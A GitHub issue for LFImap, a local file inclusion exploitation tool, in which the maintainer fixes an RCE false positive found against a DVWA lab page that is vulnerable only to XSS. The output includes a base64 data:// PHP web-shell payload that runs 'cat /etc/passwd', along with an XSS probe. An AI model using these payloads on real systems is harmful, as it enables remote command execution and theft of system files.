search

hansmach1ne / LFImap

Local File Inclusion discovery and exploitation tool
Apache License 2.0
194 stars 29 forks source link

RCE false positive when parameter is vulnerable to XSS #60

Closed hansmach1ne closed 2 weeks ago

hansmach1ne commented 3 weeks ago 
└─$ python3 lfimap.py -U "http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=aa#" -C "security=low; PHPSESSID=fd6582cc1b2843b479965f570419b6de" --lhost 192.168.56.113 --lport 99 -r -P "127.0.0.1:8080" -d -heur 

[i] Testing GET 'name' parameter...
[+] XSS -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=mns%3A817%3Ew%3Cgf%3B93%22%27rq' -> full reflection in response
    Content-Type: text/html;charset=utf-8
[+] RCE -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8%2B&c=cat%20%2Fetc%2Fpasswd'

----------------------------------------
LFImap finished with execution.
Parameters tested: 1
Requests sent: 16
Vulnerabilities found: 2
hansmach1ne commented 3 weeks ago

This false positive is because the checkPayload looks if PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K from the test payload is reflected in the response, however test payload contains different b64 encoded value: data.py: L18, L19.

hansmach1ne commented 2 weeks ago

Changed payload to include PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K, data.py: L18,L19

[i] Testing GET 'name' parameter...
[+] XSS -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=7ee%3A99l%3Ew%3Cmv%3B81%22%27cw' -> full reflection in response
    Content-Type: text/html;charset=utf-8

----------------------------------------
LFImap finished with execution.
Parameters tested: 1
Requests sent: 17
Vulnerabilities found: 1